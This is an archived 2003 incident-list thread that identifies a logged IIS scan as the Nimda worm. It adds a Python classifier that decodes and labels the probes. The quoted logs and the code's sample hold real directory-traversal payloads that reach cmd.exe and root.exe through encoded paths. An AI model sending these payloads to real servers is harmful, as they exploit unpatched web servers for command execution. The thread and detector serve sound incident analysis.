Re: Anyone know this tool?

From: Jason Falciola (falciolaat_private)
Date: Tue Jul 29 2003 - 09:57:16 PDT


    Looks like plain old Nimda to me.  Someone please correct me if I'm 
    missing something obvious.
    
    <http://www.cert.org/advisories/CA-2001-26.html>
    
    Jason Falciola
    Security Intelligence Analyst
    IBM Managed Security Services
    falciolaat_private
    
    Danny <dannyat_private>
    07/28/2003 11:24 PM
    
     
            To:     incidentsat_private
            cc: 
            Subject:        Anyone know this tool?
    
    Does anyone happen to know what tool this is? I've seen the exact same 
    scans on 6 of our servers on completely different networks. All the 
    scans have been from different source IPs and all the servers were hit 
    within a space of a few hours.
    
    Curiosity is getting the better of me since I've never seen this exact 
    pattern before :)
    
    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    
    Danny
    Work - http://www.eBoundary.com - Secure, FreeBSD hosting.
    Play - http://www.eBoundary.net - Who really sets your electronic 
    boundaries?
    AIM: eBoundaryTch  | ICQ: 3090141
    
    
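Added example, not code from either poster: a small Python classifier for the request set quoted above. The sixteen requests are the probe list that CERT CA-2001-26 attributes to Nimda (root.exe backdoor checks left by Code Red II, cmd.exe through the /c and /d shares, then cmd.exe through double-percent and overlong-UTF-8 traversal). The code decodes each path the way a lenient IIS did (two percent-decoding passes, with the overlong byte pairs mapped to separators), labels the evasion used, and applies a "Nimda-style" rule over a source's requests. The log lines embedded in it are constructed to mirror Danny's, with a TEST-NET address in place of the real source; the OVERLONG_SEPARATORS table, the trick labels and the is_nimda_style rule are my own choices of what to key on, not something the thread states.

```python
"""Classify IIS cmd.exe / root.exe probes from Apache-format access log lines.

Added example; the sample log below is constructed and uses a TEST-NET address.
"""
import re
from collections import Counter, defaultdict
from typing import Optional
from urllib.parse import unquote_to_bytes

# Apache common/combined log: ip ident user [ts] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)

# Byte pairs that unpatched IIS (pre MS00-078) treated as path separators even
# though they are not valid UTF-8 for '/' or '\'.  Assumption: these four are
# the ones worth keying on because they are the four in the quoted scan.
OVERLONG_SEPARATORS = {
    b"\xc0\xaf": b"/",    # overlong '/'
    b"\xc0\x2f": b"/",
    b"\xc1\x9c": b"\\",   # overlong '\'
    b"\xc1\x1c": b"\\",
}

TARGET_RE = re.compile(r"/(root\.exe|cmd\.exe)$", re.I)


def normalize_path(raw: str, passes: int = 2) -> str:
    """Decode like a lenient IIS: one pass for routing, a second before the
    filesystem sees the path, so %255c -> %5c -> '\\' and %%35%63 -> %5c -> '\\'
    both become a separator.  Overlong pairs are mapped after each pass.
    Returns a forward-slash path with the query string dropped."""
    data = raw.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(passes):
        data = unquote_to_bytes(data)
        for seq, sep in OVERLONG_SEPARATORS.items():
            data = data.replace(seq, sep)
    return data.decode("latin-1").replace("\\", "/")


def encoding_tricks(raw: str) -> list:
    """Label the evasion present in the raw (undecoded) target."""
    tricks = []
    if re.search(r"%25|%%", raw, re.I):          # encoded '%' -> second decode pass
        tricks.append("double-percent")
    if re.search(r"%c[01]%[0-9a-f]{2}", raw, re.I):  # 2-byte overlong sequence
        tricks.append("overlong-utf8")
    return tricks or ["plain"]


def analyze(line: str) -> Optional[dict]:
    """Return a record for a root.exe/cmd.exe probe, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m["target"]
    norm = normalize_path(raw)
    t = TARGET_RE.search(norm)
    if not t:
        return None
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "target": t.group(1).lower(),
        "traversal_depth": norm.split("/").count(".."),
        "tricks": encoding_tricks(raw),
        "normalized": norm,
    }


def is_nimda_style(records: list) -> bool:
    """Assumed rule: one source asking for root.exe AND for cmd.exe through
    both double-percent and overlong-UTF-8 traversal is the worm's fingerprint;
    a single cmd.exe request on its own is just a scanner or a copycat."""
    targets = {r["target"] for r in records}
    tricks = {t for r in records for t in r["tricks"]}
    return {"root.exe", "cmd.exe"} <= targets and {"double-percent", "overlong-utf8"} <= tricks


def summarize(lines: list) -> dict:
    """Per-source count of probe targets, e.g. {'192.0.2.10': Counter({'cmd.exe': 4, 'root.exe': 2})}."""
    per_ip = defaultdict(Counter)
    for rec in (analyze(ln) for ln in lines):
        if rec:
            per_ip[rec["ip"]][rec["target"]] += 1
    return dict(per_ip)


# Constructed sample mirroring the posted scan (source address replaced with TEST-NET).
SAMPLE_LOG = """\
192.0.2.10 - - [28/Jul/2003:22:18:39 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:39 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:42 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" "-"
192.0.2.10 - - [28/Jul/2003:22:18:43 -0500] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    recs = [r for r in (analyze(ln) for ln in SAMPLE_LOG.splitlines()) if r]
    for r in recs:
        print(f'{r["ip"]} {r["target"]:8} depth={r["traversal_depth"]} '
              f'{",".join(r["tricks"]):24} {r["normalized"]}')
    print("per-source:", summarize(SAMPLE_LOG.splitlines()))
    print("nimda-style:", is_nimda_style(recs))
```

The 404/400 statuses in the quoted log are what a non-IIS server returns; the same decoder is what you would run against an IIS box to find out whether any of these requests actually reached cmd.exe, and the "plain" label on the /c/ and /d/ requests is a reminder that those need no decoding at all, only an exposed share.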



    This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:40:45 PDT